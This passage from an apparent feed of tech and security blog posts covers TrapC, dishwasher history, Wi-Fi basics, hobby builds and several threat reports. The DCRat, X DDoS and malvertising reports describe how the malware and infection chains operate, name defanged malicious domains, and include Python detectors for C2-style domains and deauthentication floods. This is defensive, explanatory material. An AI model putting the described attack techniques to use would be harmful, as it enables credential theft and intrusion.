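           ctrl_union_layout_ok() ? "matches" : "DIFFERS FROM");
    return 0;
}
```

On GCC and Clang for little-endian targets the two packings agree; the point is that nothing in the language guarantees it, which is an argument for the self-check, not for removing the keyword.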

Don’t Call It C++


Effectively, TrapC adds RTTI, exceptions (or ‘traps’), OO classes, safe pointers, and similar C++ features to C, which raises the question of why it’s any different, especially since the whitepaper presents TrapC and C++ code usually looking the same as a feature. Here the language seems to regard itself as a ‘better C++’, mostly in terms of exception handling and templates, using ‘traps’ and ‘castplates’. Curiously there’s not much focus on “resource acquisition is initialization” (RAII), which is such a cornerstone of C++.

Meanwhile castplates are advertised as a way to make C containers ‘typesafe’, but unlike C++ templates they are created implicitly using RTTI and one might argue somewhat opaque (C++ template-like) syntax. There are few people who would argue that C++ template code is easy to read. Of note here is that in embedded programming you tend to compile C++ with both RTTI & exceptions disabled due to the overhead from them. The extensive reliance on RTTI in TrapC would seem to preclude such an option.

Circling back to the other added keyword, alias, this is TrapC’s way of providing function overloading, and it works like a C preprocessor #define:
void puts(void* x) alias printf("{}\n", x);
Then there is the new trap keyword, apparently important enough to be captured in the extension’s name. Traps are offered as an alternative to C++ exceptions, but the description is rather confusing, beyond them supposedly being less complicated and not supporting cascading exceptions up the stack. Here I personally do not see much value either way, as, like so many C++ developers, I loathe C++ exceptions with the fire of a thousand suns and do my utmost to avoid them.

My favorite approach here is found in Ada, which not only cleanly separates functions and procedures, but also requires, at compile time, that any return value from a function is handled, and implements exceptions in a way that is both light-weight and very informative, as I found for example while extensively using the Ada array type in the context of a lock-free ring buffer. During testing there were zero crashes, just the program bailing out with an exception due to a faulty offset into the array and listing the exact location and cause, as in Ada everything is bounds-checked by default.

Memory Safety


Much of the safety in TrapC would come from managed pointers, with its author describing TrapC’s memory management as ‘automatic’ in a recent presentation at an ISO C meeting. Pointers are lifetime-managed, but as the whitepaper states, the exact method used is ‘implementation defined’, instead of reference counting as in the C++ specification.

Yet none of this matters in the context of actual security issues. As I noted in 2024, the ‘red herring’ part refers to the real-life security issues that are captured in CVEs and their exploitation. Virtually all of the worst CVEs involve a lack of input validation, which allows users to access data in ‘restricted’ folders and gain access to databases and other resources. None of these involve memory safety in any way, shape or form, and thus the onus lies on preventing logic errors, performing solid input validation and preventing lazy or inattentive programmers from introducing the next world-famous CVE.

As a long-time C & C++ programmer, I have come to ‘love’ the warts in these languages as well as the lack of guardrails for the freedom they provide. Meanwhile I have learned to write test cases and harnesses to strap my code into for QA sessions, because the best way to validate code is by stressing it. Along the way I have found myself incredibly fond of Ada, as its focus on preventing ambiguity and logic errors is self-evident and regularly keeps me from making inattentive mistakes. Mistakes that in C++ would show up in the next test and/or Valgrind cycle, followed by a facepalm moment and a recompile; yet somehow programming in Ada doesn’t feel more restrictive than writing in C++.

Thus I’ll keep postulating that the issues with C were already solved in 1983 with the introduction of Ada, and accepting this fact is the only way out of this endless Groundhog Day purgatory.


hackaday.com/2025/03/11/trapc-…


DK 9x21 - Con amici così...


Von Der Leyen's wonderful idea: if the USA is no longer interested in NATO, we pay for everything ourselves just to stay in the 1950s. And then the wonderful idea of His Majesty's British Parliament to "get past" the GDPR.


spreaker.com/episode/dk-9x21-c…


Josephine Cochrane Invented the Modern Dishwasher — In 1886


Popular Science has an excellent article on how Josephine Cochrane transformed how dishes are cleaned by inventing an automated dish washing machine and obtaining a patent in 1886. Dishwashers had been attempted before, but hers was the first with the revolutionary idea of using water pressure to clean dishes placed in wire racks, rather than relying on some sort of physical scrubber. The very first KitchenAid household dishwashers were based on her machines, making modern dishwashers direct descendants of her original design.
Josephine Cochrane (née Garis)
It wasn’t an overnight success. Josephine faced many hurdles. Saying it was difficult for a woman to start a venture or do business during this period of history doesn’t do justice to just how many barriers existed, even discounting the fact that her late husband was something we would today recognize as a violent alcoholic. One who left her little money and many debts upon his death, to boot.

She was nevertheless able to focus on developing her machine, and eventually hired mechanic George Butters to help create a prototype. The two of them worked in near secrecy, because a man being seen regularly visiting her home was simply asking for trouble. Then there were all the challenges of launching a product in a business world that had little place for a woman. One can sense the weight of it all in a quote from Josephine (shared in a write-up by the USPTO) in which she says “If I knew all I know today when I began to put the dishwasher on the market, I never would have had the courage to start.”

But Josephine persevered and her invention made a stir at the 1893 World’s Fair in Chicago, winning an award and mesmerizing onlookers. Not only was it invented by a woman, but her dishwashers were used by restaurants on-site to clean tens of thousands of dishes, day in and day out. Her marvelous machine was not yet a household device, but restaurants, hotels, colleges, and hospitals all saw the benefits and lined up to place orders.

Early machines were highly effective, but they were not the affordable, standard household appliances they are today. There certainly existed a household demand for her machine — dishwashing was a tedious chore that no one enjoyed — but household dishwashing was a task primarily done by women. Women did not control purchasing decisions, and it was difficult for men of the time (who did not spend their time washing dishes) to be motivated by the benefits. The device was expensive, but it did away with a tremendous amount of labor. Surely the price was justified? Yet women themselves — the ones who would benefit the most — were often not on board. Josephine reflected that many women did not yet seem to think of their own time and comfort as having intrinsic value.

Josephine Cochrane ran a highly successful business and continued to refine her designs. She died in 1913 and it wasn’t until the 1950s that dishwashers — direct descendants of her original design — truly started to become popular with the general public.

Nowadays, dishwashers are such a solved problem that not only are they a feature in an instructive engineering story, but we rarely see anyone building one (though it has happened).

We have Josephine Cochrane to thank for that. Not just her intellect and ingenuity in coming up with it, but the fact that she persevered enough to bring her creation over the finish line.


hackaday.com/2025/03/11/joseph…


DCRat backdoor returns


Since the beginning of the year, we’ve been tracking in our telemetry a new wave of DCRat distribution, with paid access to the backdoor provided under the Malware-as-a-Service (MaaS) model. The cybercriminal group behind it also offers support for the malware and infrastructure setup for hosting the C2 servers.

Distribution


The DCRat backdoor is distributed through the YouTube platform. Attackers create fake accounts or use stolen ones, then upload videos advertising cheats, cracks, gaming bots and similar software. In the video description is a download link to the product supposedly being advertised. The link points to a legitimate file-sharing service where a password-protected archive awaits, the password for which is also in the video description.

YouTube video ad for a cheat and crack

Instead of gaming software, these archives contain the DCRat Trojan, along with various junk files and folders to distract the victim’s attention.

Archives with DCRat disguised as a cheat and crack

Backdoor


The distributed backdoor belongs to a family of remote access Trojans (RATs) dubbed Dark Crystal RAT (DCRat for short), known since 2018. Besides backdoor capability, the Trojan can load extra modules to boost its functionality. Throughout the backdoor’s existence, we have obtained and analyzed 34 different plugins, the most dangerous functions of which are keystroke logging, webcam access, file grabbing and password exfiltration.

DCRat builder plugins on the attackers’ site

Infrastructure


To support the infrastructure, the attackers register second-level domains (most often in the RU zone), which they use to create third-level domains for hosting the C2 servers. The group has registered at least 57 new second-level domains since the start of the year, five of which already serve more than 40 third-level domains.

A distinctive feature of the campaign is the appearance of certain words in the second-level domains of the malicious infrastructure, such as “nyashka”, “nyashkoon”, “nyashtyan”, etc. Users interested in Japanese pop culture will surely recognize these slang terms. Among anime and manga fans, “nyasha” has come to mean “cute” or “hon”, and it’s this word that’s most often seen in the second-level domains.

C2 server addresses with characteristic naming approach
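As an added illustration of the naming pattern described above (example code written for this page, not Kaspersky's), the following Python scans a constructed DNS query log for second-level domains whose registered label contains the slang token and groups the third-level names and querying clients under each; the hostnames, client names and log format are all assumptions.

```python
import re
from collections import defaultdict

# Constructed sample DNS query log (hypothetical clients and placeholder domains,
# NOT real indicators from the campaign). Format: <timestamp> <client> query <type> <qname>
SAMPLE_DNS_LOG = """\
2025-02-01T10:00:01Z host-a query A api.nyashka-placeholder.ru
2025-02-01T10:00:05Z host-b query A cdn.updates-placeholder.com
2025-02-01T10:01:12Z host-a query A panel.nyashkoon-placeholder.ru
2025-02-01T10:02:44Z host-c query A files.nyashka-placeholder.ru
2025-02-01T10:03:00Z host-d query A www.nyashtyan-placeholder.ru
2025-02-01T10:03:30Z host-b query A mail.placeholder.org
2025-02-01T10:04:10Z host-e query A nyashka-placeholder.ru
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+\S+\s+(?P<qname>\S+)\s*$")

# Substring shared by the slang terms the report lists ("nyashka", "nyashkoon",
# "nyashtyan"); it is matched against the registered second-level label only,
# so a random third-level host name cannot trigger it.
CAMPAIGN_TOKEN = "nyash"


def split_domain(qname):
    """Split a query name into (second-level domain, lower-level labels).

    Only single-label public suffixes (.ru, .com, ...) are handled, which is
    enough for the RU-zone domains the report describes.
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return None, []
    return ".".join(labels[-2:]), labels[:-2]


def is_campaign_like(sld):
    """True when the registered (second-level) label contains the campaign token."""
    return CAMPAIGN_TOKEN in sld.split(".")[0]


def scan_dns_log(text):
    """Group suspicious queries by second-level domain.

    Returns {sld: {"clients": set(...), "subdomains": set(...)}} for every
    second-level domain whose label follows the campaign's naming scheme; the
    subdomains set shows which third-level names were resolved under it.
    """
    hits = defaultdict(lambda: {"clients": set(), "subdomains": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing on them
        sld, lower = split_domain(m.group("qname"))
        if sld is None or not is_campaign_like(sld):
            continue
        hits[sld]["clients"].add(m.group("client"))
        if lower:
            hits[sld]["subdomains"].add(".".join(lower))
    return dict(hits)


if __name__ == "__main__":
    for sld, info in sorted(scan_dns_log(SAMPLE_DNS_LOG).items()):
        print(f"{sld}: clients={sorted(info['clients'])} subdomains={sorted(info['subdomains'])}")
```

Several distinct clients resolving different third-level names under one such second-level domain is the pattern worth escalating, since the report notes a single registered domain serving many C2 hosts.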

Victims


Based on our telemetry data since the beginning of 2025, 80% of DCRat samples using such domains as C2 servers were downloaded to the devices of users in Russia. The malware also affected a small number of users from Belarus, Kazakhstan and China.

Conclusion


Kaspersky products detect the above-described samples with the verdict Backdoor.MSIL.DCRat.
Note that we also encounter campaigns distributing other types of malware (stealers, miners, loaders) through password-protected archives, so we strongly recommend downloading game-related software only from trusted sources.


securelist.com/new-wave-of-att…


Jaguar Land Rover in the Crosshairs: a Threat Actor Claims to Have Published Confidential Data!


The cybersecurity world may be facing a new possible attack that would have hit one of the icons of the British automotive industry. Jaguar Land Rover (JLR), the prestigious luxury vehicle manufacturer, has reportedly been named in an alleged data breach claimed by a cybercriminal known as “Rey”, who claims to have obtained and published highly sensitive company data.

At the moment we cannot confirm the veracity of the news, since the organization has not yet released any official press statement on its website regarding the incident. This article should therefore be treated as an ‘intelligence source’.

Details of the Post on the Underground Forum


According to the post on the Dark Web, the alleged data breach would include around 700 internal documents, including development logs, tracking data and even source code. It also mentions an employee dataset that would contain sensitive information such as username, e-mail, display name, time zone and more.

If this information were authentic, it could include confidential data on projects under development, business strategies and employees’ personal information, with possible risks of identity theft, spear phishing attacks and industrial espionage. What would the consequences be for JLR? If the leak contained information on future models or technological innovations, the damage could extend well beyond the single attack, affecting the company’s competitiveness in the long term.

A Targeted Attack or an Exploited Flaw?


At the moment there is no official confirmation of how the attack unfolded, nor of its authenticity. It is unclear whether this was a targeted intrusion or whether Rey simply exploited a vulnerability in JLR’s systems. However, the information in circulation would suggest careful preparation and a coordinated action. If true, it would be an alarming signal for the entire automotive sector, which is increasingly exposed to cyber threats.

A Wake-Up Call for the Automotive Sector?


If confirmed, this attack would not be an isolated case: the automotive sector is increasingly targeted by cybercriminals, who see in automotive companies an enormous quantity of valuable data and critical infrastructure to compromise. With the advent of connected vehicles and digitalized supply chains, the risk of cyber intrusions keeps growing.

Conclusion


Once again, if this information were true, it would show how crucial it is to adopt advanced security strategies and strengthen protective measures to prevent data leaks and devastating attacks. The question that remains open is: how prepared is the automotive sector, really, to counter this escalation of threats?

As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving the issue prominence.

RHC will monitor how the story develops in order to publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted e-mail.

The article Jaguar Land Rover in the Crosshairs: a Threat Actor Claims to Have Published Confidential Data! comes from il blog della sicurezza informatica.


Homebrew Traffic Monitor Keeps Eyes on the Streets


How many cars go down your street each day? How fast were they going? What about folks out on a walk or people riding bikes? It’s not an easy question to answer, as most of us have better things to do than watch the street all day and keep a tally. But at the same time, this is critically important data from an urban planning perspective.

Of course, you could just leave it to City Hall to figure out this sort of thing. But what if you want to get a speed bump or a traffic light added to your neighborhood? Being able to collect your own localized traffic data could certainly come in handy, which is where TrafficMonitor.ai from [glossyio] comes in.

This open-source system allows the user to deploy an affordable monitoring device that will identify vehicles and pedestrians using a combination of machine learning object detection and Doppler radar. The system not only collects images of all the objects that pass by but can even determine their speed and direction. The data is stored and processed locally and presented via a number of graphs through the system’s web-based user interface.

While [glossyio] hopes to sell kits and even pre-built monitors at some point, you’ll have to build the hardware yourself for now. The documentation recommends a Raspberry Pi 5 for the brains of your monitor, backed up by a Coral AI Tensor Processing Unit (TPU) to help process the images coming in via the Pi Camera Module 3.

Technically, the OPS243-A Doppler radar sensor is listed as optional if you’re on a tight budget, but it looks like you’ll lose speed and direction sensing without it. Additionally, there’s support for adding an air quality sensor to see what all those passing cars are leaving behind.

This isn’t the first time we’ve seen the Raspberry Pi used as an electronic traffic cop, but it’s undoubtedly the most polished version of the concept we’ve come across. You might consider passive radar, too.


hackaday.com/2025/03/11/homebr…


Inside IEEE 802.11 Wireless Networks: Wi-Fi Architecture and Signal


IEEE 802.11 wireless networks, better known as Wi-Fi, are the beating heart of modern connectivity. From a niche solution for home use to a technological pillar for the Internet of Things (IoT), smart cities and enterprise infrastructure, Wi-Fi has evolved into something unstoppable. Today, in 2025, the arrival of Wi-Fi 7 (IEEE 802.11be) brings theoretical speeds above 46 Gb/s and sub-millisecond latency, but with it come new challenges: security, interference and spectrum management.

In this article, part of Red Hot Cyber’s Wi-Fi column, we analyze the fundamentals of IEEE 802.11 networks, exploring their architecture, how the signal works, their advantages and their limits. The goal is to understand not only the potential of Wi-Fi 7 but also the emerging challenges, particularly those related to cybersecurity and spectrum management.

Why Wi-Fi Dominates (and Where It Stumbles)


Imagine a world without Wi-Fi: no connected smartphones, no smart homes, no offices free of tangled cables. Wi-Fi has conquered the planet thanks to four strengths:

  • Pure mobility: You move, you stay connected. From robotized warehouses to university campuses, it is a game-changer.
  • Lower costs: No cabling means quick installations and savings of 30-40% compared to Ethernet [1]. Perfect for historic buildings or temporary structures.
  • Blazing speed: With Wi-Fi 7, Multi-Link Operation (MLO) uses the 2.4, 5 and 6 GHz bands simultaneously, pushing throughput to unprecedented levels.
  • Extreme flexibility: From a home LAN to a company with thousands of devices, Wi-Fi adapts.

But all that glitters is not gold. Transmission over radio waves makes it vulnerable: an attacker with a directional antenna can intercept signals from a distance, and even WPA3 is not immune to sophisticated exploits. Then there is interference: microwave ovens and Bluetooth congest the 2.4 GHz band, while 6 GHz requires advanced strategies to avoid overlap. Finally, range: regulations such as ETSI’s (20-30 dBm) limit outdoor coverage to 100-200 meters, and indoors a concrete wall can halve it.

How It Works: the Wi-Fi Architecture


Wi-Fi rests on a cell-based architecture, the Service Sets, which define how devices talk to each other:

IBSS (Ad Hoc): Direct Communication Between Devices

In an IBSS (Independent Basic Service Set) network there is no Access Point (AP): devices connect directly to one another. This scheme, also known as Ad Hoc mode, is useful for emergency scenarios or temporary networks.

Example: Industrial sensors in a factory or at a remote drilling site can use IBSS to exchange data directly, without needing a complex network architecture.

  • Scenario: A toxic gas monitoring system in a mine or refinery, where sensors must share real-time readings with a mobile control unit without a fixed infrastructure.

Operation: The sensors connect in Ad Hoc mode, passing critical information among themselves to raise a local alert in case of danger.

BSS: Networks with a Centralized Access Point (AP)


In the Basic Service Set (BSS), an AP acts as coordinator, managing the Wi-Fi clients and optimizing communication. This model is the standard for home and business environments.

Example: a Wi-Fi 6 network for small offices, with a single AP using OFDMA (Orthogonal Frequency-Division Multiple Access) and MU-MIMO to handle multiple simultaneous connections, allocating portions of spectrum more efficiently.

ESS: Extended-Coverage Networks with Seamless Roaming


The Extended Service Set (ESS) links multiple BSSs through a Distribution System (DS), usually over Ethernet or wireless backhaul. It is the model used to guarantee uninterrupted coverage over large areas.

Example:

  • In a hospital with fast handoff, the APs use 802.11r (Fast Roaming) to ensure clients move smoothly from one AP to another without having to perform a full new authentication (thanks to Key Caching).
  • In industrial environments with AGVs (Automated Guided Vehicles), Wi-Fi must guarantee roaming without latency. Protocols such as 802.11k/v let devices know in advance which AP is the best one to connect to, reducing transition times.

In 2025, Wi-Fi 7 raises the bar: MLO allows multiple bands to be used in parallel, reducing latency and increasing reliability. The result? A device can move from 2.4 GHz (long range) to 6 GHz (high capacity) without you noticing. Add 320 MHz channels and bidirectional MU-MIMO, and you have a network that handles even 50 devices in one room without blinking.

Having seen how the Wi-Fi architecture works with IBSS, BSS and ESS to guarantee connectivity and seamless roaming, the natural question is: what physically happens to the signal as we move from one Access Point to another?

The Wi-Fi Signal: Physics at Work


Wi-Fi is not just software and networks, but electromagnetic waves that must cover distances and overcome obstacles to connect devices. Its frequencies operate in the ISM (2.4 and 5 GHz) and U-NII (6 GHz) bands, and their propagation is governed by precise physical laws. Frequency dictates everything: at 2.4 GHz the wavelength is 12.5 cm, ideal for passing through walls; at 6 GHz it drops to 5 cm, perfect for speed but fragile against obstacles.

The received power collapses with distance according to the inverse-square law:

$$P_r = \frac{P_t}{(4\pi R)^2}$$

Add absorption (10-15 dB for a concrete wall) and reflections, and you understand why the signal dies out at 50 meters indoors. But there are tricks: beamforming focuses the waves like a lighthouse beam, and OFDM splits the data into sub-channels to dodge interference. Wi-Fi 7 goes further, with 4096-QAM packing more bits into each symbol, increasing throughput by 20% compared to Wi-Fi 6.
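Worked out from the inverse-square formula above in decibels (an added derivation, not part of the original article):

$$10\log_{10} P_r = 10\log_{10} P_t - 20\log_{10}(4\pi R)$$

so doubling the distance $R$ costs $20\log_{10} 2 \approx 6$ dB, and a single wall’s $10$ to $15$ dB of absorption removes as much signal as multiplying $R$ by $10^{10/20} \approx 3.2$ to $10^{15/20} \approx 5.6$. The wavelengths quoted above follow from $\lambda = c/f$: $\lambda = 3\times10^{8}/(2.4\times10^{9}) = 0.125$ m at 2.4 GHz and $3\times10^{8}/(6\times10^{9}) = 0.05$ m at 6 GHz.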

Wi-Fi 7: the Future Is Now


In 2025, Wi-Fi 7 is the new reference standard, taking wireless connectivity to levels never seen before:

  • 320 MHz channels: Double those of Wi-Fi 6, a data highway.
  • MLO: Real-time multi-band operation, latency under 1 ms.
  • 6 GHz: Clean spectrum, but a higher AP density is needed for coverage.

The result? You can stream 8K, manage an army of IoT devices and work remotely without lag. But there is a price: more APs means more cost, and security must keep pace with ever more sophisticated threats.

Security Challenges and Outlook


Wi-Fi is powerful, but also vulnerable if not adequately protected. WPA3 is a step forward, but the threats persist:

  • Deauthentication flood attacks, which forcibly disconnect devices.
  • Exploitation of vulnerabilities in chipsets, as demonstrated by the FragAttacks (2021).
  • Exponentially growing IoT: every connected device is a potential weak point in the network.

MLO helps distribute traffic and reduce risk, but without adequate encryption and segmentation, a compromised Access Point can be a Trojan horse. Moreover, the spread of the 6 GHz band will lead to a higher device density, making it necessary to adopt AI algorithms for dynamic interference management and real-time channel optimization.
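The deauthentication flood in the list above is recognizable from frame counts alone; the following Python is an added example (not from the original article) that flags any source sending a burst of 802.11 deauthentication frames within a one-second window, run over a constructed set of decoded frame headers. The MAC addresses, window size and threshold are assumptions; the management-frame type and subtype values are those defined by IEEE 802.11.

```python
from collections import Counter

# IEEE 802.11: management frames are type 0, and subtype 12 is Deauthentication.
# Protected Management Frames (802.11w, mandatory in WPA3) authenticate these
# frames so forged ones are dropped; this detector is for what still arrives on
# networks without PMF, or for monitoring the air for attempts.
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12

# Constructed sample of decoded frame headers (hypothetical MAC addresses, not a
# real capture): (timestamp_s, type, subtype, source_mac, dest_mac)
AP_MAC = "02:00:00:00:00:01"        # hypothetical access point
FLOODER_MAC = "02:00:00:00:00:aa"   # hypothetical source of the flood
BROADCAST = "ff:ff:ff:ff:ff:ff"

SAMPLE_FRAMES = (
    # ordinary traffic: data frames (type 2) and one beacon (type 0, subtype 8)
    [(0.10 + 0.5 * i, 2, 0, AP_MAC, "02:00:00:00:00:10") for i in range(8)]
    + [(0.30, 0, 8, AP_MAC, BROADCAST)]
    # a single legitimate deauth from the AP (e.g. an idle client timing out)
    + [(3.20, 0, 12, AP_MAC, "02:00:00:00:00:11")]
    # burst: 15 spoofed broadcast deauths inside one second
    + [(1.05 + 0.05 * i, 0, 12, FLOODER_MAC, BROADCAST) for i in range(15)]
)


def is_deauth(frame):
    """True for a management frame whose subtype is Deauthentication."""
    _, ftype, subtype, _, _ = frame
    return ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Count deauthentication frames per (source MAC, fixed time window).

    Returns a sorted list of (source_mac, window_start_s, count) for every
    window in which one source sent more than `threshold` deauth frames.
    A lone deauth from the AP is normal; a burst from one source is a flood.
    """
    counts = Counter()
    for frame in frames:
        if not is_deauth(frame):
            continue
        ts, _, _, src, _ = frame
        counts[(src, int(ts // window_s))] += 1
    alerts = [
        (src, bucket * window_s, n)
        for (src, bucket), n in counts.items()
        if n > threshold
    ]
    return sorted(alerts)


if __name__ == "__main__":
    for src, start, n in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"possible deauth flood: {n} frames from {src} in window starting at {start:.1f}s")
```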

Conclusion: a Precarious Balance


The IEEE 802.11 protocol is a masterpiece of engineering that has made Wi-Fi synonymous with speed, flexibility and ubiquity. With Wi-Fi 7, the future of connectivity enters a new era, but not without compromises:

  • Security and cyber threats remain a constant challenge.
  • Interference and spectrum management will require intelligent solutions.
  • Costs and scalability could slow adoption in certain environments.

For those working in cybersecurity and network management, the message is clear: design with foresight, protect every layer and prepare for a world that is ever more wireless, and ever more exposed to risk.

Follow our Wi-Fi column to stay up to date!

References:

[1] IEEE (2024). Wi-Fi 7 Technical Overview.

[2] Higher Order Feature Extraction and Selection for Robust Human Gesture Recognition using CSI of COTS Wi-Fi Devices mdpi.com/1424-8220/19/13/2959

The article Inside IEEE 802.11 Wireless Networks: Wi-Fi Architecture and Signal comes from il blog della sicurezza informatica.


Hacking a Heavyweight Philco Radio


Red and gold bakelite Philco farm radio on a workbench

There’s something magical about the clunk of a heavy 1950s portable radio – the solid thunk of Bakelite, the warm hum of tubes glowing to life. This is exactly why [Ken’s Lab] took on the restoration of a Philco 52-664, a portable AC/DC radio originally sold for $45 in 1953 (a small fortune back then!). Despite its beat-up exterior and faulty guts, [Ken] methodically restored it to working condition. His video details every crackling capacitor and crusty resistor he replaced, and it’s pure catnip for any hacker with a soft spot for analog tech. Does the name Philco ring a bell? Lately, we did cover the restoration of a 1958 Philco Predicta television.

What sets this radio hack apart? To begin with, [Ken] kept the restoration authentic, repurposing original capacitor cans and using era-appropriate materials – right down to boiling out old electrolytics in his wife’s discarded cooking pot. But, he went further. Lacking the space for modern components, [Ken] fabbed up a custom mounting solution from stiff styrofoam, fibreboard, and all-purpose glue. He even re-routed the B-wiring with creative terminal hacks. It’s a masterclass in patience, precision, and resourcefulness.

If this tickles your inner tinkerer, don’t miss out on the full video. It’s like stepping into a time machine.

youtube.com/embed/TimWXHoAfss?…


hackaday.com/2025/03/10/hackin…


Satellite Imagery You Can Play With


Satellite imagery is in the news right now, but not all satellite constellations are the preserve of governments. Satellogic operates a series of CubeSats with Earth imaging payloads, and best of all, they maintain an open dataset. [Mark Litwintschik] takes us through using it.

Starting with a script to recover the locations of the satellites, he moves on to the data itself. It’s in a huge S3 bucket, for which parsing the metadata becomes a big data question rather than one of simple retrieval. After parsing he loads the resulting data into a database, from which he can then perform queries more easily. He uses Qatar as his example, and shows us the resulting imagery.

The dataset isn’t comprehensive, it’s obvious that the areas surveyed have been done at the behest of customers. But who knows, your part of the world might be one of the areas in the dataset, and now you have all the tools you need to explore. It certainly beats low-res weather satellite imagery.


hackaday.com/2025/03/10/satell…


What’s Wrong With This Antenna Tuner?


[Tech Minds] built one of those cheap automatic antenna tuners you see everywhere — this one scaled up to 350 watt capability. The kit is mostly built, but you do have to add the connectors and a few other stray bits. You can see how he did it in the video below.

What was very interesting, however, was that it wasn’t able to do a very good job tuning a wire antenna across the ham bands, and he asks for your help on what he should try to make things better.

It did seem to work in some cases, and changing the length of the wire changed the results, so we would guess some of it might be a resonance on the antenna wire. However, you would think it could do a little better. It is well known that if a wire is one of a number of certain lengths, it will have extremely high impedance in multiple ham bands and be challenging to tune. So random wires need to not be exactly random. You have to avoid those lengths.

In addition, we were surprised there wasn’t more RF protection on the power lines. We would probably have suggested winding some coax to act as a shield choke, RF beads, and even extra bypass capacitors.

Another possible problem is that the diodes in these units are often not the best. [PU1OWL] talks about that in another video and bypasses some of the power lines against RF, too.

If you have any advice, we are sure he’d love to hear it. As [PU1OWL] points out, a tuner like this can’t be any better than its SWR measurement mechanism. Of course, all of these tuners take a few watts to light them up. You can, however, tune with virtually no power with a VNA.

youtube.com/embed/L8VH30MwNEU?…


hackaday.com/2025/03/10/whats-…


Solar-Powered E-Reader With No Buttons


Modern e-readers such as the Amazon Kindle are incredible pieces of engineering, but that doesn’t mean there’s no room for improvement. A device custom-built to your own specifications is always going to provide a more satisfying experience than something purchased off the shelf. That’s why [fel88] put together this custom e-reader which offers a number of unique features, such as a solar panel on the back and button-free operation.

One issue with modern e-readers, at least as [fel88] sees it, is that they have a lot of unnecessary features. This project removes most of them, stripping down the device to its core functionality: a straightforward menu for selecting books and gesture-sensing for navigating the menu as well as changing the pages. The only physical input on the device is a small reed switch to turn the device on. A 3D printed case holds the e-ink display and encloses the inner workings, driven by an Arduino Mega 2560 and powered by three lithium-ion capacitors (LICs) and a small solar panel.

By dropping all of the unnecessary features, the device doesn’t need to waste energy with things like WiFi or Bluetooth and can get around 880 pages on a single charge, not counting any extra energy coming in through the solar panel while it’s operating. The LICs will also theoretically improve its life cycle as well. If you’re still stuck with a paperweight when you formerly had a working e-reader, though, there are plenty of ways to bring old devices back to life as well.


hackaday.com/2025/03/10/solar-…


Freeing Windows


There have been several attempts to make an unencumbered version of Windows. ReactOS is perhaps the best-known, although you could argue Wine and its progeny, while not operating systems in the strictest sense of the word, might be the most successful. Joining the fray is Free95, a GPL-3.0 system that, currently, can run simple Windows programs. The developer promises to push to even higher compatibility.

As you might expect, the GitHub site is calling for contributors. There will be a lot to do. The src subdirectory has a number of files, but when you consider the sheer volume of stuff crammed into Windows, it is just a minimal start.

As for the “Does it run Doom?” test, we are pretty sure the answer is no, not yet. While we applaud the effort, we do think it is a long road to get from where the project is to where even ReactOS is, much less Windows itself. Besides, Windows is a rapidly moving target.

As virtualization becomes easier and faster, the need for these programs diminishes. You can easily run a Windows OS inside your host operating system. If it outperforms the original on period hardware, maybe that’s good enough. On the other hand, if you are trying to run old hardware, maybe something like this will let you get a few more years out of it, one day.

We’ve looked at ReactOS before. If you are just looking to reduce bloat, there are other ways to go.


hackaday.com/2025/03/10/freein…


X Goes Offline Due to a Dark Storm DDoS Attack. Elon Musk: “Large and Coordinated Group”


X, the social media platform formerly known as Twitter, was offline for a considerable time today. According to Downdetector.com, X first experienced widespread problems at around 5:40 ET on Monday.

Some users reported being unable to load X posts or receiving error messages such as “Something went wrong. Try reloading”.

X then resumed service late this morning, but appeared to suffer outages again at around 10:00 ET, peaking at 40,000 problem reports, and then at 13:00 ET and again at 19:00 Italian local time.

The outages were reported globally.

Dark Storm Team’s Claims


Meanwhile the Dark Storm Team group claimed responsibility for a DDoS attack on X. The hackers formed as a pro-Palestinian collective in 2023 and have allegedly targeted government websites of NATO countries, Israel and nations that support Israel.

As our readers know, a DDoS (distributed denial-of-service) attack involves suspicious volumes of traffic or traffic spikes that slow down a website or service or make it unavailable. Flooding a target with malformed connections can make it inaccessible to legitimate users.

In the Telegram post obtained by Red Hot Cyber, the collective claims responsibility for today’s DDoS attack on X. Dark Storm Team wrote that it had managed to “take Twitter offline” and shared a screenshot of a real-time connectivity status page showing failed connection attempts from multiple locations around the world.

The Dark Storm Team (DST) hacker group was reportedly created in September 2023, a few weeks before Hamas’s terrorist attack of 7 October against Israel.

The group is said to be pro-Palestinian and to have possible links to Russia.

Le dichiarazioni di Elon Musk


“C’è stato (c’è ancora) un massiccio attacco informatico contro X”, ha scritto Musk lunedì pomeriggio. “Siamo attaccati ogni giorno, ma questo è stato fatto con molte risorse. È coinvolto un gruppo numeroso e coordinato e/o un paese. Tracciare…”

Musk è anche l’amministratore delegato di Tesla e SpaceX, oltre a guidare il DOGE (Dipartimento per l’efficienza governativa) del presidente Donald Trump.

L'articolo X va Offline per un Attacco DDoS di Dark Storm. Elon Musk: “Gruppo Mumeroso e Coordinato” proviene da il blog della sicurezza informatica.


Microsoft reveals a shocking attack: 1 million PCs infected by malware hidden in ads


Microsoft has revealed that in recent months nearly 1 million Windows devices have been hit by a sophisticated malvertising campaign. Credentials, cryptocurrency and confidential information were stolen from the computers of infected users.

According to the researchers, the campaign began in December 2024, when unknown attackers started distributing links through which advertisements were loaded. Microsoft says the sites hosting the ads were pirate streaming platforms hosting illegal content. The company’s report names two such domains: movies7[.]net and 0123movie[.]art.

“The streaming sites embedded malicious redirectors to generate revenue from pay-per-view or pay-per-click platforms,” the experts write.
Attack diagram
The malicious links, embedded via iframes, took victims through a chain of redirects, a series of intermediate sites (such as a fake technical-support site), and finally led to GitHub repositories hosting a set of malicious files.

The malware was delivered in several stages. In the initial stages, information about the user’s device was collected, presumably to configure the subsequent stages of the attack. In later stages, malware-detection applications were disabled and a connection to the control servers was established, after which the NetSupport malware was installed on the system.

“Depending on the second-stage payload, one or more executables and sometimes an encoded PowerShell script were delivered to the infected device,” the researchers wrote. “These files triggered a chain of events that included command execution, payload delivery, defense evasion, persistence, command-and-control communication and data theft.”

